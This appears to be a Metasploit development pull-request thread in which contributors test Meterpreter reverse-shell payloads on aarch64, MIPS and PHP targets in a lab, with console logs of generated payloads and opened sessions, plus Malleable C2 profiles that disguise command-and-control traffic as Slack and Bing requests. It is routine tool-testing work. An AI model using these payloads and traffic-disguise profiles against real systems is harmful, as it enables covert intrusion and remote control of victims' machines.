[*] http://192.168.3.10:8080 handling request from 10.5.132.215; (UUID: t6e579hx) Redirecting stageless: URI '/-2JSXzJYRcPLS81ToXvVZQkXrrO9k_Gv9J5VXtj1ScObvLMJmuixMTqG4dhH' with UA '' -> UUID -2JSXzJYRcPLS81ToXvVCARUHDAYnW8L8_mH8A8akgix08cTXXLAoXJsAvpfCcnzWsrqOCHrc8GrNlaRAsLPKnQTwx
[!] http://192.168.3.10:8080 handling request from 10.5.132.215; (UUID: t6e579hx) Without a database connected that payload UUID tracking will not work!
[*] http://192.168.3.10:8080 handling request from 10.5.132.215; (UUID: t6e579hx) Attaching orphaned/stageless session...
[!] http://192.168.3.10:8080 handling request from 10.5.132.215; (UUID: t6e579hx) Without a database connected that payload UUID tracking will not work!
[*] Meterpreter session 17 opened (192.168.3.10:8080 -> 10.5.132.215:34856) at 2026-06-15 11:46:17 -0400

msf payload(linux/aarch64/meterpreter_reverse_http) > sessions -i -1
[*] Starting interaction with 17...

meterpreter > getuid
Server username: kali
meterpreter > sysinfo
Computer     : kali-raspberrypi
OS           : Debian  (Linux 6.6.63-v8+)
Architecture : aarch64
BuildTuple   : aarch64-linux-musl
Meterpreter  : aarch64/linux
meterpreter > exit

test profiles

zoom ✅

msf payload(linux/aarch64/meterpreter_reverse_http) > generate -f elf -o ~/Public/metsrv.aarch64.elf
[*] Writing 1198496 bytes to ~/Public/metsrv.aarch64.elf...
msf payload(linux/aarch64/meterpreter_reverse_http) > 
[!] http://192.168.3.10:8080 handling request from 10.5.132.215; (UUID: 8qzlg4my) Without a database connected that payload UUID tracking will not work!
[*] http://192.168.3.10:8080 handling request from 10.5.132.215; (UUID: 8qzlg4my) Redirecting stageless: URI '/s/58462514417 /wc/58462514417' with UA '' -> UUID jBYKd9QwHZ32rvC2nJ7qjAtIReJTtJlIJv5R707xToMQPXWvQKzGoYUn0vmVgzTuLptZi_9
[!] http://192.168.3.10:8080 handling request from 10.5.132.215; (UUID: 8qzlg4my) Without a database connected that payload UUID tracking will not work!
[*] http://192.168.3.10:8080 handling request from 10.5.132.215; (UUID: 8qzlg4my) Attaching orphaned/stageless session...
[!] http://192.168.3.10:8080 handling request from 10.5.132.215; (UUID: 8qzlg4my) Without a database connected that payload UUID tracking will not work!
[*] Meterpreter session 15 opened (192.168.3.10:8080 -> 10.5.132.215:46332) at 2026-06-15 11:37:12 -0400

msf payload(linux/aarch64/meterpreter_reverse_http) > sessions -i -1
[*] Starting interaction with 15...

meterpreter > getuid
Server username: kali
meterpreter > sysinfo
Computer     : kali-raspberrypi
OS           : Debian  (Linux 6.6.63-v8+)
Architecture : aarch64
BuildTuple   : aarch64-linux-musl
Meterpreter  : aarch64/linux
meterpreter >

office364_calendar ✅

msf payload(linux/aarch64/meterpreter_reverse_http) > to_handler set LURIInterrupt: use the 'exit' command to quit
msf payload(linux/aarch64/meterpreter_reverse_http) > generate -f elf -o ~/Public/metsrv.aarch64.elf
[*] Writing 1198496 bytes to ~/Public/metsrv.aarch64.elf...
msf payload(linux/aarch64/meterpreter_reverse_http) > 
[!] http://192.168.3.10:8080 handling request from 10.5.132.215; (UUID: 85um2dkl) Without a database connected that payload UUID tracking will not work!
[*] http://192.168.3.10:8080 handling request from 10.5.132.215; (UUID: 85um2dkl) Redirecting stageless: URI '/owa/' with UA '' -> UUID zWNz6wvjbVKapZy98JWHLAOjjH4d8sNfFn0QFDdNPSvac2RUgY05
[!] http://192.168.3.10:8080 handling request from 10.5.132.215; (UUID: 85um2dkl) Without a database connected that payload UUID tracking will not work!
[*] http://192.168.3.10:8080 handling request from 10.5.132.215; (UUID: 85um2dkl) Attaching orphaned/stageless session...
[!] http://192.168.3.10:8080 handling request from 10.5.132.215; (UUID: 85um2dkl) Without a database connected that payload UUID tracking will not work!
[*] Meterpreter session 16 opened (192.168.3.10:8080 -> 10.5.132.215:37772) at 2026-06-15 11:43:11 -0400

msf payload(linux/aarch64/meterpreter_reverse_http) > sessions -i -1
[*] Starting interaction with 16...

meterpreter > getuid
Server username: kali
meterpreter > sysinfo
Computer     : kali-raspberrypi
OS           : Debian  (Linux 6.6.63-v8+)
Architecture : aarch64
BuildTuple   : aarch64-linux-musl
Meterpreter  : aarch64/linux
meterpreter > exit

rtmp ✅

msf payload(linux/aarch64/meterpreter_reverse_http) > 
[!] http://192.168.3.10:8080 handling request from 10.5.132.215; (UUID: uvifq250) Without a database connected that payload UUID tracking will not work!
[*] http://192.168.3.10:8080 handling request from 10.5.132.215; (UUID: uvifq250) Redirecting stageless: URI '/idle/1376547834/1' with UA '' -> UUID rbDvAgV6gQ1G70D3LN9nEggmxJTMlfZ4zsUblijUSnOdQGcjYzuNbjZkT4zEpcJzZcfiObtaJ5plOYnu
[!] http://192.168.3.10:8080 handling request from 10.5.132.215; (UUID: uvifq250) Without a database connected that payload UUID tracking will not work!
[*] http://192.168.3.10:8080 handling request from 10.5.132.215; (UUID: uvifq250) Attaching orphaned/stageless session...
[!] http://192.168.3.10:8080 handling request from 10.5.132.215; (UUID: uvifq250) Without a database connected that payload UUID tracking will not work!

msf payload(linux/aarch64/meterpreter_reverse_http) > [*] Meterpreter session 18 opened (192.168.3.10:8080 -> 10.5.132.215:52642) at 2026-06-15 12:02:11 -0400

msf payload(linux/aarch64/meterpreter_reverse_http) > sessions -i -1
[*] Starting interaction with 18...

meterpreter > getuid
Server username: kali
meterpreter > sysinfo
Computer     : kali-raspberrypi
OS           : Debian  (Linux 6.6.63-v8+)
Architecture : aarch64
BuildTuple   : aarch64-linux-musl
Meterpreter  : aarch64/linux
meterpreter >

MIPSLE

reverse tcp (staged)

msf payload(linux/mipsle/meterpreter/reverse_tcp) > generate -f elf -o ~/Public/m.mipsle.elf
[*] Writing 356 bytes to ~/Public/m.mipsle.elf...
msf payload(linux/mipsle/meterpreter/reverse_tcp) > 
[*] Sending stage (1378248 bytes) to 10.5.132.221
[*] Meterpreter session 1 opened (192.168.3.10:4444 -> 10.5.132.221:57806) at 2026-06-16 07:55:00 -0400

msf payload(linux/mipsle/meterpreter/reverse_tcp) > sessions -i -1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: ubnt
meterpreter > sysinfo
Computer     : ubnt
OS           : Debian 9.13 (Linux 4.14.54-UBNT)
Architecture : mips
BuildTuple   : mipsel-linux-muslsf
Meterpreter  : mipsle/linux
meterpreter > exit

reverse https (stageless)

msf payload(linux/mipsle/meterpreter_reverse_http) > 
[!] http://192.168.3.10:8080 handling request from 10.5.132.221; (UUID: bc1esp6x) Without a database connected that payload UUID tracking will not work!
[*] http://192.168.3.10:8080 handling request from 10.5.132.221; (UUID: bc1esp6x) Redirecting stageless: URI '/mlAUuqU1QWl0kXKUHqBNWwNZqJagEL9juynhjr4AJ58UO5gR0dCmciJKtjVX6jR5CJvDTTC6NO_wu8Zkd' with UA '' -> UUID mlAUuqU1QWl0kXKUHqBNRgw5jljx50zvdB_xXcP6DYICVi_F6-phUHmUxmbWFD2ss
[!] http://192.168.3.10:8080 handling request from 10.5.132.221; (UUID: bc1esp6x) Without a database connected that payload UUID tracking will not work!
[*] http://192.168.3.10:8080 handling request from 10.5.132.221; (UUID: bc1esp6x) Attaching orphaned/stageless session...
[!] http://192.168.3.10:8080 handling request from 10.5.132.221; (UUID: bc1esp6x) Without a database connected that payload UUID tracking will not work!
[*] Meterpreter session 2 opened (192.168.3.10:8080 -> 10.5.132.221:52984) at 2026-06-16 07:56:12 -0400

msf payload(linux/mipsle/meterpreter_reverse_http) > sessions -i -1
[*] Starting interaction with 2...

meterpreter > getuid
Server username: ubnt
meterpreter > sysinfo
Computer     : ubnt
OS           : Debian 9.13 (Linux 4.14.54-UBNT)
Architecture : mips
BuildTuple   : mipsel-linux-muslsf
Meterpreter  : mipsle/linux
meterpreter >

test profiles

MIPS64

reverse tcp (stageless)

reverse https (stageless)

test profiles

MacOS testing

TBD

dledda-r7 · 2026-06-10T08:36:21Z

Hello @OJ, I am testing the profiles and the other arches, i noticed the staged TCP seems broken, can you check it on your side?

update: also some profile are not working, I will start triaging them
update 2, manage to get the two profile working: here is the diff compared to the original.

slack diff file

$ diff slack_before.profile slack_after.profile   
13a14
>             base64url;
39a41
>             base64url;
80a83
>             base64url;
88d90
<             print;
93a96
>             base64url;

bingsearch_getonly diff file

36c36
<             print;
---
>             base64url;

fixed slack profile

http-get {

    set uri "/messages/C0527B0NM";
    
    client {

#       header "Host" "msdevchat.slack.com";
        header "Accept" "*/*";
        header "Accept-Language" "en-US";
        header "Connection" "close";


        metadata {
            base64url;
            append ";_ga=GA1.2.875";
            append ";__ar_v4=%8867UMDGS643";
            prepend "d=";
        #    prepend "cvo_sid1=R456BNMD64;";
            prepend "_ga=GA1.2.875;";
            prepend "b=.12vPkW22o;";
            header "Cookie";
        }

    }

    server {
        header "Content-Type" "text/html; charset=utf-8";
        header "Connection" "close";
        header "Server" "Apache";
        header "X-XSS-Protection" "0";
        header "Strict-Transport-Security" "max-age=31536000; includeSubDomains; preload";
        header "Referrer-Policy" "no-referrer";
        header "X-Slack-Backend" "h";
        header "Pragma" "no-cache";
        header "Cache-Control" "private, no-cache, no-store, must-revalidate";
        header "X-Frame-Options" "SAMEORIGIN";
        header "Vary" "Accept-Encoding";
        header "X-Via" "haproxy-www-w6k7";

        output {
            base64url;
            prepend "<!DOCTYPE html>";
            prepend "<html lang=\"en-US\" class=\"supports_custom_scrollbar\">";
            prepend "<head>";
            prepend "<meta charset=\"utf-8\">";
            prepend "<meta http-equiv=\"X-UA-Compatible\" content=\"IE=edge,chrome=1\">";
            prepend "<meta name=\"referrer\" content=\"no-referrer\">";
            prepend "<meta name=\"superfish\" content=\"nofish\">";
            prepend "<title>Microsoft Developer Chat Slack</title>";
            prepend "<meta name=\"author\" content=\"Slack\">";
            prepend "<link rel=\"dns-prefetch\" href=\"https://a.slack-edge.com?id=";

                append "\"> </script>";
                append "<div id=\"client-ui\" class=\"container-fluid sidebar_theme_\"\"\">";
            append "<div id=\"banner\" class=\"hidden\" role=\"complementary\" aria-labelledby=\"notifications_banner_aria_label\">";
            append "<h1 id=\"notifications_banner_aria_label\" class=\"offscreen\">Notifications Banner</h1>";
            append "<div id=\"notifications_banner\" class=\"banner sk_fill_blue_bg hidden\">";
            append "Slack needs your permission to <button type=\"button\" class=\"btn_link\">enable desktop notifications</button>.<button type=\"button\" class=\"btn_unstyle banner_dismiss ts_icon ts_icon_times_circle\" data-action=\"dismiss_banner\" aria-label=\"Dismiss\"></button>";
            append "</div>";
            append "<div id=\"notifications_dismiss_banner\" class=\"banner seafoam_green_bg hidden\">";
            append "We strongly recommend enabling desktop notifications if you’ll be using Slack on this computer.<span class=\"inline_block no_wrap\">";
            append "<button type=\"button\" class=\"btn_link\" onclick=\"TS.ui.banner.close(); TS.ui.banner.growlsPermissionPrompt();\">Enable notifications</button> •";
            append "<button type=\"button\" class=\"btn_link\" onclick=\"TS.ui.banner.close()\">Ask me next time</button> •";
            append "<button type=\"button\" class=\"btn_link\" onclick=\"TS.ui.banner.closeNagAndSetCookie()\">Never ask again on this computer</button>";
            append "</span>";
            append "</div>";
            print;
        }
    }
}

http-post {

    set uri "/api/api.test";

    client {

#       header "Host" "msdevchat.slack.com";
        header "Accept" "*/*";
        header "Accept-Language" "en-US";

        output {
            base64url;
                append ";_ga=GA1.2.875";
            append "__ar_v4=%8867UMDGS643";
            prepend "d=";
    #       prepend "cvo_sid1=R456BNMD64;";
            prepend "_ga=GA1.2.875;";
            prepend "b=.12vPkW22o;";
            header "Cookie";
        }


        id {
#not sure on this, just trying to blend it in.
            base64url;
            prepend "GA1.";
            header "_ga";
        }
    }

    server {

        header "Content-Type" "application/json; charset=utf-8";
        header "Connection" "close";
        header "Server" "Apache";
        header "Strict-Transport-Security" "max-age=31536000; includeSubDomains; preload";
        header "Referrer-Policy" "no-referrer";
        header "X-Content-Type-Options" "nosniff";
        header "X-Slack-Req-Id" "6319165c-f976-4d0666532";
        header "X-XSS-Protection" "0";
        header "X-Slack-Backend" "h";
        header "Vary" "Accept-Encoding";
        header "Access-Control-Allow-Origin" "*";
        header "X-Via" "haproxy-www-6g1x";


        output {
            base64;
                prepend "{\"ok\":true,\"args\":{\"user_id\":\"LUMK4GB8C\",\"team_id\":\"T0527B0J3\",\"version_ts\":\"";
                append "\"},\"warning\":\"superfluous_charset\",\"response_metadata\":{\"warnings\":[\"superfluous_charset\"]}}";
            print;
        }
    }
}

bingsearch_getonly fixed file

http-get {

    set uri "/search/";

    client {

        header "Host" "www.bing.com";
        header "Accept" "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8";
        header "Cookie" "DUP=Q=GpO1nJpMnam4UllEfmeMdg2&T=283767088&A=1&IG";

        metadata {
            base64url;
            parameter "q";
        }

        parameter "go" "Search";
        parameter "qs" "bs";
        parameter "form" "QBRE";


    }

    server {

        header "Cache-Control" "private, max-age=0";
        header "Content-Type" "text/html; charset=utf-8";
        header "Vary" "Accept-Encoding";
        header "Server" "Microsoft-IIS/8.5";
        header "Connection" "close";


        output {
            netbios;
            prepend "<!DOCTYPE html><html lang=\"en\" xml:lang=\"en\" xmlns=\"http://www.w3.org/1999/xhtml\" xmlns:Web=\"http://schemas.live.com/Web/\"><script type=\"text/javascript\">//<![CDATA[si_ST=new Date;//]]></script><head><!--pc--><title>Bing</title><meta content=\"text/html; charset=utf-8\" http-equiv=\"content-type\" /><link href=\"/search?format=rss&amp;q=canary&amp;go=Search&amp;qs=bs&amp;form=QBRE\" rel=\"alternate\" title=\"XML\" type=\"text/xml\" /><link href=\"/search?format=rss&amp;q=canary&amp;go=Search&amp;qs=bs&amp;form=QBRE\" rel=\"alternate\" title=\"RSS\" type=\"application/rss+xml\" /><link href=\"/sa/simg/bing_p_rr_teal_min.ico\" rel=\"shortcut icon\" /><script type=\"text/javascript\">//<![CDATA[";
            append "G={ST:(si_ST?si_ST:new Date),Mkt:\"en-US\",RTL:false,Ver:\"53\",IG:\"4C1158CCBAFC4896AD78ED0FF0F4A1B2\",EventID:\"E37FA2E804B54C71B3E275E9589590F8\",MN:\"SERP\",V:\"web\",P:\"SERP\",DA:\"CO4\",SUIH:\"OBJhNcrOC72Z3mr21coFQw\",gpUrl:\"/fd/ls/GLinkPing.aspx?\" }; _G.lsUrl=\"/fd/ls/l?IG=\"+_G.IG ;curUrl=\"http://www.bing.com/search\";function si_T(a){ if(document.images){_G.GPImg=new Image;_G.GPImg.src=_G.gpUrl+\"IG=\"+_G.IG+\"&\"+a;}return true;};//]]></script><style type=\"text/css\">.sw_ddbk:after,.sw_ddw:after,.sw_ddgn:after,.sw_poi:after,.sw_poia:after,.sw_play:after,.sw_playa:after,.sw_playd:after,.sw_playp:after,.sw_st:after,.sw_sth:after,.sw_ste:after,.sw_st2:after,.sw_plus:after,.sw_tpcg:after,.sw_tpcw:after,.sw_tpcbk:after,.sw_arwh:after,.sb_pagN:after,.sb_pagP:after,.sw_up:after,.sw_down:after,.b_expandToggle:after,.sw_calc:after,.sw_fbi:after,";
            base64url;
        }
    }
}

http-post {

    set uri "/Search/";
    set verb "GET";

    client {

        header "Host" "www.bing.com";
        header "Accept" "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8";
        header "Cookie" "DUP=Q=GpO1nJpMnam4UllEfmeMdg2&T=283767088&A=1&IG";

        output {
            base64url;
            parameter "q";
        }

        parameter "go" "Search";
        parameter "qs" "bs";

        id {
            base64url;
            parameter "form";
        }
    }

    server {

        header "Cache-Control" "private, max-age=0";
        header "Content-Type" "text/html; charset=utf-8";
        header "Vary" "Accept-Encoding";
        header "Server" "Microsoft-IIS/8.5";
        header "Connection" "close";


        output {
            netbios;
            prepend "<!DOCTYPE html><html lang=\"en\" xml:lang=\"en\" xmlns=\"http://www.w3.org/1999/xhtml\" xmlns:Web=\"http://schemas.live.com/Web/\"><script type=\"text/javascript\">//<![CDATA[si_ST=new Date;//]]></script><head><!--pc--><title>Bing</title><meta content=\"text/html; charset=utf-8\" http-equiv=\"content-type\" /><link href=\"/search?format=rss&amp;q=canary&amp;go=Search&amp;qs=bs&amp;form=QBRE\" rel=\"alternate\" title=\"XML\" type=\"text/xml\" /><link href=\"/search?format=rss&amp;q=canary&amp;go=Search&amp;qs=bs&amp;form=QBRE\" rel=\"alternate\" title=\"RSS\" type=\"application/rss+xml\" /><link href=\"/sa/simg/bing_p_rr_teal_min.ico\" rel=\"shortcut icon\" /><script type=\"text/javascript\">//<![CDATA[";
            append "G={ST:(si_ST?si_ST:new Date),Mkt:\"en-US\",RTL:false,Ver:\"53\",IG:\"4C1158CCBAFC4896AD78ED0FF0F4A1B2\",EventID:\"E37FA2E804B54C71B3E275E9589590F8\",MN:\"SERP\",V:\"web\",P:\"SERP\",DA:\"CO4\",SUIH:\"OBJhNcrOC72Z3mr21coFQw\",gpUrl:\"/fd/ls/GLinkPing.aspx?\" }; _G.lsUrl=\"/fd/ls/l?IG=\"+_G.IG ;curUrl=\"http://www.bing.com/search\";function si_T(a){ if(document.images){_G.GPImg=new Image;_G.GPImg.src=_G.gpUrl+\"IG=\"+_G.IG+\"&\"+a;}return true;};//]]></script><style type=\"text/css\">.sw_ddbk:after,.sw_ddw:after,.sw_ddgn:after,.sw_poi:after,.sw_poia:after,.sw_play:after,.sw_playa:after,.sw_playd:after,.sw_playp:after,.sw_st:after,.sw_sth:after,.sw_ste:after,.sw_st2:after,.sw_plus:after,.sw_tpcg:after,.sw_tpcw:after,.sw_tpcbk:after,.sw_arwh:after,.sb_pagN:after,.sb_pagP:after,.sw_up:after,.sw_down:after,.b_expandToggle:after,.sw_calc:after,.sw_fbi:after,";
            print;
        }
    }
}

Staged payloads embed the standard session TLVs (UUID, session GUID, expiry) in the config block but never include a C2 group — they inherit the stager's already-connected socket via argv "m <fd>". Previously, parse_config_block returned 0 as long as the TLV blob parsed, so the "argv[0] == 'm'" fallback in main() never ran and mettle sat in its event loop with no transport registered. Track how many transports get added from C2 groups while iterating, and if none were added, free the parsed packet and return -1. The fd-based branch then wires up "fd://<n>" as expected. UUID and session GUID extracted earlier in the function are left on the dispatcher; the fallback path's parse_default_args sets them again from the embedded DEFAULT_OPTS cmdline, so staged sessions get the right identity.

OJ · 2026-06-12T01:54:57Z

Hi @dledda-r7 ! Thanks again for the continued testing mate. I've just pushed up a change that should resolve the staged payloads. That was a silly mistake, and I though I had covered it already.

Please let me know if that works for you. Cheers.

jbx81-1337 · 2026-06-12T07:23:17Z

Hey @OJ! Ok I will test it asap.
Regarding the profiles, I think I understand we don't support the 'print' in the http-get and it has to be base64 or base64url. I am not sure if the profiles are wrong or if it is a limitation from our side

OJ · 2026-06-15T23:40:59Z

@dledda-r7 the "print" statement is effectively always supported because it just means "render". So we don't have any code that checks for that keyword because it should always output that result in the correct spot.

Which is the best profile to use to validate this? The "broken" Slack one?

msutovsky-r7 · 2026-06-16T05:38:46Z

PHP Testing

TCP

Staged

msf > use payload/php/meterpreter/reverse_tcp
msf payload(php/meterpreter/reverse_tcp) > set lhost 127.0.0.1
lhost => 127.0.0.1
msf payload(php/meterpreter/reverse_tcp) > set lport 4242
lport => 4242
msf payload(php/meterpreter/reverse_tcp) > generate -f raw -o /tmp/msf.php
[*] Writing 1110 bytes to /tmp/msf.php...
msf payload(php/meterpreter/reverse_tcp) > to_handler
[*] Payload Handler Started as Job 0
msf payload(php/meterpreter/reverse_tcp) > 
[!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want ReverseListenerBindAddress?
[*] Started reverse TCP handler on 127.0.0.1:4242 
WARNING: Local file /home/ms/.msf4/payloads/meterpreter/meterpreter.php is being used
[*] Sending stage (67114 bytes) to 127.0.0.1
WARNING: Local file /home/ms/.msf4/payloads/meterpreter/ext_server_stdapi.php is being used
[*] Meterpreter session 1 opened (127.0.0.1:4242 -> 127.0.0.1:38400) at 2026-06-15 11:38:28 +0200

msf payload(php/meterpreter/reverse_tcp) > sessions -1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        : cachyos-x8664
OS              : Linux cachyos-x8664 7.0.12-1-cachyos #1 SMP PREEMPT_DYNAMIC Sat, 13 Jun 2026 11:49:00 +0000 x86_64
Architecture    : x64
System Language : en_US.UTF-8
Meterpreter     : php/linux
meterpreter > getuid
Server username: ms

stageless

msf payload(php/meterpreter_reverse_tcp) > generate -f raw -o /tmp/msf.php
WARNING: Local file /home/ms/.msf4/payloads/meterpreter/meterpreter.php is being used
[*] Writing 59572 bytes to /tmp/msf.php...
msf payload(php/meterpreter_reverse_tcp) > to_handler
WARNING: Local file /home/ms/.msf4/payloads/meterpreter/meterpreter.php is being used
[*] Payload Handler Started as Job 0
msf payload(php/meterpreter_reverse_tcp) > 
[!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want ReverseListenerBindAddress?
[*] Started reverse TCP handler on 127.0.0.1:4242 
WARNING: Local file /home/ms/.msf4/payloads/meterpreter/ext_server_stdapi.php is being used
[*] Meterpreter session 1 opened (127.0.0.1:4242 -> 127.0.0.1:47408) at 2026-06-15 11:28:26 +0200

msf payload(php/meterpreter_reverse_tcp) > sessions -1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        : cachyos-x8664
OS              : Linux cachyos-x8664 7.0.12-1-cachyos #1 SMP PREEMPT_DYNAMIC Sat, 13 Jun 2026 11:49:00 +0000 x86_64
Architecture    : x64
System Language : en_US.UTF-8
Meterpreter     : php/linux
meterpreter > getuid
Server username: ms

http

stageless

resource (/home/ms/Desktop/msf_scripts/php_malleable_c2.rb)> use payload/php/meterpreter_reverse_http
resource (/home/ms/Desktop/msf_scripts/php_malleable_c2.rb)> set lhost 127.0.0.1
lhost => 127.0.0.1
resource (/home/ms/Desktop/msf_scripts/php_malleable_c2.rb)> set lport 4242
lport => 4242
resource (/home/ms/Desktop/msf_scripts/php_malleable_c2.rb)> generate -f raw -o /tmp/msf.php
WARNING: Local file /home/ms/.msf4/payloads/meterpreter/meterpreter.php is being used
[*] Writing 59832 bytes to /tmp/msf.php...
resource (/home/ms/Desktop/msf_scripts/php_malleable_c2.rb)> to_handler
WARNING: Local file /home/ms/.msf4/payloads/meterpreter/meterpreter.php is being used
[*] Payload Handler Started as Job 0
msf payload(php/meterpreter_reverse_http) > 
[!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want ReverseListenerBindAddress?
[*] Started HTTP reverse handler on http://127.0.0.1:4242
[!] http://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: 30lbdjer) Without a database connected that payload UUID tracking will not work!
[*] http://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: 30lbdjer) Redirecting stageless: URI '/yYvJoHd5zbYrLzggQQD9jAlPTUnjzlbTij53UlsuZ3fhPmI3yLb' with UA 'Mozilla/5.0 (iPad; CPU OS 17_7_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Mobile/15E148 Safari/604.1' -> UUID yYvJoHd5zbYrLzggQQD9-wtVcenbiYBOud3a_halbMRO25tP9b2TEgU-7r-qBR1U-u_ZiejcyBBxq2QB
[!] http://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: 30lbdjer) Without a database connected that payload UUID tracking will not work!
[*] http://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: 30lbdjer) Attaching orphaned/stageless session...
[!] http://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: 30lbdjer) Without a database connected that payload UUID tracking will not work!
WARNING: Local file /home/ms/.msf4/payloads/meterpreter/ext_server_stdapi.php is being used
[*] Meterpreter session 1 opened (127.0.0.1:4242 -> 127.0.0.1:60706) at 2026-06-15 12:41:24 +0200

msf payload(php/meterpreter_reverse_http) > sessions -1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        : cachyos-x8664
OS              : Linux cachyos-x8664 7.0.12-1-cachyos #1 SMP PREEMPT_DYNAMIC Sat, 13 Jun 2026 11:49:00 +0000 x86_64
Architecture    : x64
System Language : en_US.UTF-8
Meterpreter     : php/linux
meterpreter > getuid
Server username: ms

amazon.profile

resource (/home/ms/Desktop/msf_scripts/php_malleable_c2.rb)> use payload/php/meterpreter_reverse_http
resource (/home/ms/Desktop/msf_scripts/php_malleable_c2.rb)> set lhost 127.0.0.1
lhost => 127.0.0.1
resource (/home/ms/Desktop/msf_scripts/php_malleable_c2.rb)> set lport 4242
lport => 4242
resource (/home/ms/Desktop/msf_scripts/php_malleable_c2.rb)> set malleablec2 /home/ms/Documents/Malleable-C2-Profiles/Normal/amazon.profile
malleablec2 => /home/ms/Documents/Malleable-C2-Profiles/Normal/amazon.profile
resource (/home/ms/Desktop/msf_scripts/php_malleable_c2.rb)> generate -f raw -o /tmp/msf.php
WARNING: Local file /home/ms/.msf4/payloads/meterpreter/meterpreter.php is being used
[*] Writing 60444 bytes to /tmp/msf.php...
resource (/home/ms/Desktop/msf_scripts/php_malleable_c2.rb)> to_handler
WARNING: Local file /home/ms/.msf4/payloads/meterpreter/meterpreter.php is being used
[*] Payload Handler Started as Job 0
msf payload(php/meterpreter_reverse_http) > 
[!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want ReverseListenerBindAddress?
[*] Started HTTP reverse handler on http://127.0.0.1:4242
[!] http://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: 9hu437bx) Without a database connected that payload UUID tracking will not work!
[*] http://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: 9hu437bx) Redirecting stageless: URI '/s/ref=nb_sb_noss_1/167-3294888-0262949/field-keywords=books' with UA 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko' -> UUID AmyI6BtrNo6vZbxqxUp4UAcwJRdP6c2Y0cdnu35y4GQMmP5Pfv4U1_YrUy4hgX_J5BHweFb6eZnNRCH85K
[!] http://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: 9hu437bx) Without a database connected that payload UUID tracking will not work!
[*] http://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: 9hu437bx) Attaching orphaned/stageless session...
[!] http://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: 9hu437bx) Without a database connected that payload UUID tracking will not work!
WARNING: Local file /home/ms/.msf4/payloads/meterpreter/ext_server_stdapi.php is being used
[*] Meterpreter session 1 opened (127.0.0.1:4242 -> 127.0.0.1:51956) at 2026-06-15 12:43:02 +0200

msf payload(php/meterpreter_reverse_http) > sessions -1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        : cachyos-x8664
OS              : Linux cachyos-x8664 7.0.12-1-cachyos #1 SMP PREEMPT_DYNAMIC Sat, 13 Jun 2026 11:49:00 +0000 x86_64
Architecture    : x64
System Language : en_US.UTF-8
Meterpreter     : php/linux
meterpreter > getuid
Server username: ms

bing_maps.profile

resource (/home/ms/Desktop/msf_scripts/php_malleable_c2.rb)> use payload/php/meterpreter_reverse_http
resource (/home/ms/Desktop/msf_scripts/php_malleable_c2.rb)> set lhost 127.0.0.1
lhost => 127.0.0.1
resource (/home/ms/Desktop/msf_scripts/php_malleable_c2.rb)> set lport 4242
lport => 4242
resource (/home/ms/Desktop/msf_scripts/php_malleable_c2.rb)> set malleablec2 /home/ms/Documents/Malleable-C2-Profiles/Normal/bing_maps.profile
malleablec2 => /home/ms/Documents/Malleable-C2-Profiles/Normal/bing_maps.profile
resource (/home/ms/Desktop/msf_scripts/php_malleable_c2.rb)> generate -f raw -o /tmp/msf.php
WARNING: Local file /home/ms/.msf4/payloads/meterpreter/meterpreter.php is being used
[*] Writing 60464 bytes to /tmp/msf.php...
resource (/home/ms/Desktop/msf_scripts/php_malleable_c2.rb)> to_handler
WARNING: Local file /home/ms/.msf4/payloads/meterpreter/meterpreter.php is being used
[*] Payload Handler Started as Job 0

[!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want ReverseListenerBindAddress?
msf payload(php/meterpreter_reverse_http) > [*] Started HTTP reverse handler on http://127.0.0.1:4242
[!] http://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: dmzg95xo) Without a database connected that payload UUID tracking will not work!
[*] http://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: dmzg95xo) Redirecting stageless: URI '/maps/overlaybfpr' with UA 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36' -> UUID iYeJwQO-BzutB74IxyhN6glTwKzLOdspnUdjo8ipamkC4NGFI208hLuy8qYZlG1X2aZW9lMnDrg32t715
[!] http://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: dmzg95xo) Without a database connected that payload UUID tracking will not work!
[*] http://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: dmzg95xo) Attaching orphaned/stageless session...
[!] http://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: dmzg95xo) Without a database connected that payload UUID tracking will not work!
WARNING: Local file /home/ms/.msf4/payloads/meterpreter/ext_server_stdapi.php is being used
[*] Meterpreter session 1 opened (127.0.0.1:4242 -> 127.0.0.1:54648) at 2026-06-15 13:24:31 +0200

msf payload(php/meterpreter_reverse_http) > sessions -1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        : cachyos-x8664
OS              : Linux cachyos-x8664 7.0.12-1-cachyos #1 SMP PREEMPT_DYNAMIC Sat, 13 Jun 2026 11:49:00 +0000 x86_64
Architecture    : x64
System Language : en_US.UTF-8
Meterpreter     : php/linux
meterpreter > getuid
Server username: ms

bingsearch_getonly.profile

resource (/home/ms/Desktop/msf_scripts/php_malleable_c2.rb)> use payload/php/meterpreter_reverse_http
resource (/home/ms/Desktop/msf_scripts/php_malleable_c2.rb)> set lhost 127.0.0.1
lhost => 127.0.0.1
